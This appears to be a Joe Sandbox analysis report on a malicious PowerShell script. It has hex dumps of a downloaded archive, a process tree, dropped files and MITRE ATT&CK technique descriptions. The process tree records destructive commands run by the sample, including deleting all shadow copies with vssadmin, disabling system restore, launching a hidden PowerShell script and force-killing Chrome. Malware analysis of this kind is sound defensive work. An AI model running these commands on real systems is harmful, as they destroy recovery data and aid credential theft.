2024-12-01 09:37:29 UTC	16384	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 05 1c 59 59 d9 bb 21 00 7f 5f 00 01 fa 1a 04 01 1b 00 00 00 70 61 79 6c 6f 61 64 2f 43 68 72 6f 6d 65 43 6f 6d 62 6f 50 61 63 6b 2e 65 78 65 ec bd 79 78 14 55 16 37 5c dd 9d 86 40 12 aa 59 1a a2 28 34 d2 6a b0 5d 1a 83 1a 08 48 17 e9 86 6a e9 40 90 55 65 d3 68 06 37 64 48 37 8b 06 48 e8 04 e8 29 5a 71 c0 7d 1d 45 c7 6d 66 70 d4 10 36 cd 02 59 58 42 00 51 16 95 80 5b b5 2d 10 18 21 01 84 fa ce 39 b7 aa ba 13 60 c6 f7 7b de 7f be e7 f9 78 8c 55 75 ef ef de 7b ee b9 e7 9e 7b ce dd 3a fb de 15 9c 89 e3 b8 04 f8 53 14 8e 2b e3 d8 3f 17 f7 07 fe 19 38 ae 53 ef f5 9d b8 4f 3b ec e8 53 66 f0 ed e8 33 6e c6 c3 f9 b6 59 b3 9f f8 d3 ec fb 1f b7 e5 de 3f 73 e6 13 7e db 03 0f d9 66 07 66 da 1e 9e 69 73 8f 1e 6b 7b fc 89 07 1f ba 39 25 a5 Data Ascii: PKYY!_payload/ChromeComboPack.exeyxU7\@Y(4j]Hj@Ueh7dH7H)Zq}Emfp6YXBQ[-!9`{xUu{{:S+?8SO;Sf3nY?s~ffisk{9%
2024-12-01 09:37:29 UTC	16384	IN	Data Raw: f4 be 40 ee a2 04 63 c7 a8 91 d4 33 40 5f c1 4b d1 05 cc ab c0 82 fe 3c 60 e5 13 af a0 e7 1b 75 e1 08 82 62 c5 7e a9 92 4c d7 86 74 6a b0 c3 eb 71 dc 66 84 7e f8 35 a8 41 0e bf 6b 5c 90 0d 12 8c 0e 7b 48 4c 8c b7 0e 6f 1a d0 ca 3a b4 e8 77 ea c4 fa 1f e3 f7 e6 bb 74 7e 67 a8 fc fe f3 5d ad f9 5d c7 64 a4 1b f1 bb d3 fa f6 54 26 b0 7c 97 af 35 cb 5b fd fb 9f bf d7 74 6e 99 f2 5f 7e af 49 f6 ef c1 9a 5f fa b7 9a f0 5f fc 7a e2 19 ed 3e 33 a5 2a 2f 38 f8 1e 9c d3 0c 67 5d c0 df 15 9b 9b c5 af ed b0 1e 8f 3d cb db ba d0 2f de dd 9a 17 5c 64 1c 14 70 88 c1 73 c6 39 d6 f4 72 f8 4c 98 cc af 2a 8f d3 54 ea 7e b8 b8 99 a5 4b cc 52 d3 7d 39 2b d0 4d 96 cc 39 f3 74 81 02 87 1d 5c 10 6a 46 dc 2f 05 4d ca 5a 33 44 b7 2e cd f5 1a c9 f0 c1 dd aa 30 ba bf 27 82 b6 45 d3 Data Ascii: @c3@_K<`ub~Ltjqf~5Ak\{HLo:wt~g]]dT&\|5[tn_~I__z>3/8g]=/\dps9rLT~KR}9+M9t\jF/MZ3D.0'E
2024-12-01 09:37:29 UTC	16384	IN	Data Raw: ed 78 04 06 59 d8 2f 76 e0 4a d1 0a 0b a4 8f 0c 44 c7 0f b8 9a 9d a8 7e b6 1d 87 ae 38 93 a6 ee 6a e0 38 66 35 e3 8c 39 4d a1 8f a5 7e 5d ad 92 07 49 bb 7c 30 50 43 fe 62 e0 2a ca 6d b8 4e 94 ed 4b 11 95 05 56 80 ad 61 8a cd 80 be 3c ee b1 b2 eb 02 5f 87 d9 20 bd 16 0e b5 95 78 2d ed d5 4f 70 1f e1 63 74 49 c2 0e c5 e9 7b 5e c6 ed 3d f6 bf 38 92 36 dd 60 7e 9e a8 cc 0f 72 ca 84 eb 66 81 5c 69 70 b7 c0 bf 0a ff 6d f0 df c9 f9 6c bc cd 32 0b 24 0e 44 1a 60 5e ef 3e 82 8b 84 ea ef 40 5d a8 78 4a 35 92 4e 5f 92 48 bc 41 e5 3f 37 42 e6 0b 15 4f b5 71 32 4f e6 9c 12 03 de a0 8a 06 87 fe d9 f6 8a a7 3a 69 e4 df 69 64 1a 8d cc a0 28 82 ac 7d 15 45 92 79 73 ea af 08 d7 4f 67 5e 09 ae 77 53 2e 86 eb d9 0b df 03 ae 9f 75 5f 06 ae a7 ba af 04 17 b3 e5 f2 a5 aa dd 0b Data Ascii: xY/vJD~8j8f59M~]I\|0PCb*mNKVa<_ x-OpctI{^=86`~rf\ipml2$D`^>@]xJ5N_HA?7BOq2O:iid(}EysOg^wS.u_
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: 77 ec 73 b8 6b 3d fc 29 c0 d9 93 87 95 9d fc 48 80 ca f3 d4 b2 df c0 24 8f bd 0a 43 6b 7b 0a e1 79 8e 16 62 c4 3d a7 8c 3e f0 1f cf 65 7f f0 63 c2 bf 88 38 33 a1 2c dc 89 e9 ec 5b a1 b4 57 3a fb 2a d4 e6 38 55 39 83 8b d1 3a ef c9 0b 2e ce 01 6c f8 0e 4b 21 0f f3 aa 1e 06 65 56 da f3 50 e7 7f 0a d7 00 b6 a7 13 08 23 9b d4 f6 90 e7 70 c8 f3 29 5b df 8d e4 65 15 14 4f 8e e8 f1 e4 21 f1 26 f3 da de eb 12 3a 3a 7f 01 c4 80 38 5c 0f 48 9c 0d 48 f4 cf 50 1c f9 ab 2d c1 12 ab 80 27 27 a4 50 61 a5 f6 f0 b5 c8 7b b6 5c 8d ea e5 1e 37 c2 fd be d2 c0 16 df 06 12 6b a7 3f bd 3d 38 33 cb 8a 3b e3 83 94 a9 e8 d1 8a a7 1b cd ed c1 92 ac 33 e7 59 ad ce 33 8f 00 9c e0 a4 21 8d e7 9b 4a b3 d6 25 b3 fe ca 83 81 fe c0 26 77 a0 58 d4 19 bb 1a 50 12 66 d9 30 75 d1 fb 0b 9d 28 Data Ascii: wsk=)H$Ck{yb=>ec83,[W:*8U9:.lK!eVP#p)[eO!&::8\HHP-''Pa{\7k?=83;3Y3!J%&wXPf0u(
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: b5 c8 a1 7b ad 72 68 79 b6 1c 5a cd f7 e8 e6 48 ba 5f 1c e6 f1 7b 8d 3b 68 e2 49 ce 7e 5c 6d 91 43 53 5b 7c a1 99 0d 3e 75 26 53 e7 1b 98 ed 2e 5c 8a ff 41 f3 d8 ad 7a 0c 1e 1e 7d be 20 b8 26 d7 39 d6 ad b4 e8 93 08 d4 4e 0c c9 88 9e 76 85 8d 6e dc 60 a8 3c 2a 3e 1f 91 f2 5b e5 fc 56 29 d8 8d de d4 ef cb a6 46 c9 d4 4c 66 31 66 be 9d a6 99 b9 2e 4d 88 5d e3 86 e9 b4 1e 5b 41 33 25 85 98 77 2b 3b ea 40 74 17 48 9d a5 93 88 cd d0 d3 2f 05 9a ba 39 6c 38 75 d9 67 aa 92 39 ae db 6b fb 1a 7b c2 f2 54 18 96 4b 98 a7 32 ec a9 8e 7a 71 e0 5d e2 ec 1d c1 70 3f e9 97 c0 b2 57 f8 90 13 21 4e e8 d8 af 1c 9a 79 18 06 2c 07 4b da 04 b2 1b f5 70 a2 a2 fa f8 41 b9 39 e7 46 b2 d7 8d 55 b5 65 6f 13 a6 05 8a 1b ec bf a2 70 6f 70 f2 58 71 43 8d 64 da ef c1 5d 24 19 83 2a 6a Data Ascii: {rhyZH_{;hI~\mCS[\|>u&S.\Az} &9Nvn`<>[V)FLf1f.M][A3%w+;@tH/9l8ug9k{TK2zq]p?W!Ny,KpA9FUeopopXqCd]$j
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: b0 62 06 46 54 c8 ea 50 66 c2 ce b8 1c 05 ec 4d 97 e3 4c 61 af 03 19 4d 28 40 68 78 49 ab 63 1d c2 86 c7 1f fd f9 03 66 83 b0 e1 9d 47 17 3f 60 26 3b bb 11 d4 b8 b2 a5 1f 1a d8 f1 86 08 56 60 07 2b 5f cc c3 0e 4c 39 ff a7 f3 9a 14 fe ca 24 6c 2c df bc 08 3e 92 e4 27 0b 8b f0 42 71 71 b7 d5 bc 13 e4 80 47 95 41 b7 23 bf 96 f1 5b 97 bd 61 c5 5c 46 24 0b 2a 9d cd 95 f3 45 14 97 c0 45 3c c8 3b 1e 29 18 8f cd ea 04 ee 61 28 41 e7 b3 c7 89 74 a0 85 40 90 d9 21 99 eb 3c 2c 9c 1f e4 81 28 51 b8 cc 0d 2e fb 2e ff fe e8 1b 48 cd f6 e3 c2 da 59 d8 32 2f e3 7b 2f 0b 23 65 ba d8 31 67 50 d6 a9 d2 e7 d8 d4 83 22 43 2b fa c5 a8 71 e9 6c 98 07 87 79 18 1a 1c 6b 73 21 c0 64 8e b7 fa de 79 f1 56 c7 41 88 20 df a2 fd 88 ef 61 3c 0f bb 9c 4a bb f7 7f 53 5a 64 0f b9 01 62 02 Data Ascii: bFTPfMLaM(@hxIcfG?`&;V`+_L9$l,>'BqqGA#[a\F$*EE<;)a(At@!<,(Q..HY2/{/#e1gP"C+qlyks!dyVA a<JSZdb
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: 1c 71 51 48 11 b2 ed 6c e5 ec 90 d9 32 91 b4 8f b6 42 9a e9 84 82 94 20 be 74 76 6c 88 24 26 32 94 1d 13 19 17 0d 44 21 66 d2 7f 2d b7 2c 38 21 5c 24 d3 16 5b 8c 90 df e5 a3 29 69 a8 44 12 1d 29 62 c7 4b a4 91 32 68 3d df c9 09 d7 24 19 09 c2 c6 4a e4 31 61 ec 38 89 ac b9 64 b1 a2 58 09 34 0f b1 24 41 2b 70 a9 2c 41 1e 0a 0d 8f 94 7a 28 d5 1f 6c a5 c4 8f d2 53 42 41 e9 7d 27 8c a5 f2 6f 8e 87 f3 17 cb 63 62 74 42 09 82 97 90 00 f1 a1 b1 a3 42 3a 36 77 12 7d 3d 1a d1 c6 c8 d0 80 61 62 4c 67 9a 9b 99 4e f7 f6 17 38 d8 86 0d b7 95 ce 60 a3 f0 e9 84 37 e1 4f 08 08 07 c2 96 08 23 86 c3 33 86 90 12 33 08 36 95 5e 13 9f e7 e3 33 c1 07 92 20 e9 da 4a 4d be 4b c7 23 7c e0 7f 02 fc c8 b4 24 9d e1 5a 3a 23 08 77 42 42 24 10 b1 44 30 21 23 3c 09 11 84 4a c1 1d 0e ae Data Ascii: qQHl2B tvl$&2D!f-,8!\$[)iD)bK2h=$J1a8dX4$A+p,Az(lSBA}'ocbtBB:6w}=abLgN8`7O#336^3 JMK#\|$Z:#wBB$D0!#<J
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: e3 70 07 2c 8e 58 9c b1 b4 25 e9 70 22 2f 9c 81 2d 3e 4f c7 32 02 8b 20 39 96 d2 7e d3 0e ea 2f 48 8e 66 71 d2 a9 ed 90 80 dc 3a c8 63 19 6f 24 20 4a 83 a4 44 69 9a 5a 12 c3 8f 4b 12 2a 45 54 98 40 45 69 6e a9 8d 97 4c c6 9f 28 c6 a6 d4 1c c9 95 ed 18 7f 6a f8 e8 ee 22 1b 7e 56 0c 81 88 56 63 48 d4 4c 33 01 fc 18 a9 5c 95 a4 a4 ea 26 20 73 43 f8 1f d2 43 fe da c9 a9 5b 07 88 50 5b fe 6f 83 35 e1 74 f5 ff 29 17 12 4f a2 54 27 e1 9e c0 37 1e 94 7e 44 4a 3f 53 a2 50 c1 b4 53 1c cf ff 43 55 d8 f1 7e 5b 25 ad f0 ff 58 25 01 a5 56 f7 1f 3a 8d 94 93 24 52 83 d1 0e 6a 98 04 bd 03 90 20 2c 22 22 90 a9 07 3d ae 9a 59 a1 cb 7f 9f 31 99 ff cc bc 86 f9 cf 50 24 90 27 ca 24 7c 32 87 54 12 32 2b 04 b5 9d 44 c7 64 d7 8f 1d 3e 74 b8 4e 0c 01 be 29 15 c6 e1 7b 84 3f 8d 2f Data Ascii: p,X%p"/->O2 9~/Hfq:co$ JDiZK*ET@EinL(j"~VVcHL3\& sCC[P[o5t)OT'7~DJ?SPSCU~[%X%V:$Rj ,""=Y1P$'$\|2T2+Dd>tN){?/
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: 23 29 81 2d 1e 5d be 74 10 65 c9 32 25 06 89 e6 a3 f0 6a 7e cf f3 f2 45 da fb c5 8a 70 51 d5 fc 44 b8 51 f0 8b 0a 84 df 34 51 ee 2d 37 1c f8 3b 2c c2 1d c4 7f e6 d9 e6 a6 03 7f 6f 42 1d 27 21 cc 2f 05 7e be 55 7e 1d 98 5f 2e fc ec c6 13 ff a9 7a ee 6d 07 3a ec 62 f3 53 5f 2f d1 c2 de c0 4f 64 c9 6d 4f 14 a9 6e 34 0b b3 09 2d aa dc e2 87 43 1e 5a d2 f5 83 5f 82 fa 87 4c e3 b4 54 c9 ca 6d 54 13 f9 2f 3a 24 2f 47 f2 4a a8 65 f4 88 73 8f 72 33 10 f9 05 39 93 57 6c 3d f2 0a f5 21 2f c9 8b dc 8c 62 1e 2f 40 d8 26 3a 8c 8b a4 ba 64 f0 23 7a 0b 92 82 b6 c4 34 ae e6 96 9c b0 66 87 68 0c 52 2d 27 aa 15 ea 41 b5 a2 5d 2d 3a b3 53 54 13 2f 27 f2 3a ea 4e 1e 26 37 72 4c 72 a5 28 6f d4 a5 2e d6 01 35 8d ea 6e 27 22 84 25 84 a5 1a 61 25 67 07 72 4e 70 30 6a 50 d6 26 8e Data Ascii: #)-]te2%j~EpQDQ4Q-7;,oB'!/~U~_.zm:bS_/OdmOn4-CZ_LTmT/:$/GJesr39Wl=!/b/@&:d#z4fhR-'A]-:ST/':N&7rLr(o.5n'"%a%grNp0jP&
2024-12-01 09:37:30 UTC	16384	IN	Data Raw: 11 65 cb c0 d9 fe fa ab 07 1b 65 73 ec 07 e3 f4 36 3f 6c b1 9f 03 18 01 ad 8f e4 15 e6 f6 57 51 92 72 72 d7 03 e8 4f 7c 68 3f 45 23 84 77 8d 25 f9 8c 50 d6 f9 5b 89 0e c6 6f 91 54 cb 55 a5 0c 8c 9d f1 e8 9a 9b 9b 1f ec 2b 33 ea 4e 7a f6 8d ef ff 1c f9 e9 3e e1 b5 d1 f5 92 0c 93 e6 c6 2f b7 ab 70 d3 04 e5 3c 98 73 0c fd ee f5 1d 03 d3 65 2c 32 fd f6 3b 28 04 f7 e3 fd cd e6 de a7 2b 0e 98 16 d2 8e dd eb a8 ea 37 fd 25 98 1c da e1 1c ac 28 db f1 d0 6d 83 b2 42 7f d5 3c 4c 5e 91 3d 50 8e 44 18 a6 bc 2d 1d 1d 53 a5 c7 4d 84 af 9f 2e b7 60 4a 2e 9f 97 6e ba 3d 46 a0 a2 e1 25 8a e9 9d 61 5a f4 be b2 e3 0b fd 7b 4b f4 ce aa 31 de a8 25 ce 64 d7 18 cb 6b c9 fc 51 96 14 b0 e7 a1 61 a7 27 5c 21 1d 01 51 ca a8 e0 d5 f3 c8 1b e5 f0 98 82 ee a8 5f 03 d2 86 b2 d1 ee d9 Data Ascii: ees6?lWQrrO\|h?E#w%P[oTU+3Nz>/p<se,2;(+7%(mB<L^=PD-SM.`J.n=F%aZ{K1%dkQa'\!Q_

Target ID:	0
Start time:	04:37:20
Start date:	01/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	04:38:28
Start date:	01/12/2024
Path:	C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
Imagebase:	0x7ff7e5300000
File size:	18'960'364 bytes
MD5 hash:	FAECB8128727E4D7B36E49B3161A2C9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	7
Start time:	04:38:30
Start date:	01/12/2024
Path:	C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Imagebase:	0x7ff7e5300000
File size:	18'960'364 bytes
MD5 hash:	FAECB8128727E4D7B36E49B3161A2C9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	10
Start time:	04:38:39
Start date:	01/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	04:38:40
Start date:	01/12/2024
Path:	C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
Imagebase:	0x7ff7e5300000
File size:	18'960'364 bytes
MD5 hash:	FAECB8128727E4D7B36E49B3161A2C9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	14
Start time:	04:38:48
Start date:	01/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Disable-ComputerRestore -Drive C:\\"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	04:38:51
Start date:	01/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Enable-ComputerRestore -Drive C:\\"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	21
Start time:	04:38:55
Start date:	01/12/2024
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin delete shadows /for=C: /all /quiet
Imagebase:	0x7ff6422b0000
File size:	145'920 bytes
MD5 hash:	B58073DB8892B67A672906C9358020EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	23
Start time:	04:38:57
Start date:	01/12/2024
Path:	C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Imagebase:	0x7ff7e5300000
File size:	18'960'364 bytes
MD5 hash:	FAECB8128727E4D7B36E49B3161A2C9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	25
Start time:	04:39:07
Start date:	01/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Disable-ComputerRestore -Drive C:\\"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	04:39:11
Start date:	01/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Enable-ComputerRestore -Drive C:\\"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	04:39:15
Start date:	01/12/2024
Path:	C:\Windows\System32\vssadmin.exe
Wow64 process (32bit):	false
Commandline:	vssadmin delete shadows /for=C: /all /quiet
Imagebase:	0x7ff6422b0000
File size:	145'920 bytes
MD5 hash:	B58073DB8892B67A672906C9358020EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	04:40:28
Start date:	01/12/2024
Path:	C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Imagebase:	0x7ff78c9b0000
File size:	17'046'266 bytes
MD5 hash:	8FD73177DC4A6FCC03F8E0307960A488
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	04:40:29
Start date:	01/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report back.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\3cnxjfcw

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pyd

C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pyd

Windows Analysis Report
back.ps1

Target ID:	34
Start time:	04:40:32
Start date:	01/12/2024
Path:	C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Imagebase:	0x7ff78c9b0000
File size:	17'046'266 bytes
MD5 hash:	8FD73177DC4A6FCC03F8E0307960A488
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	04:40:37
Start date:	01/12/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /IM chrome.exe
Imagebase:	0x7ff6557b0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	38

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre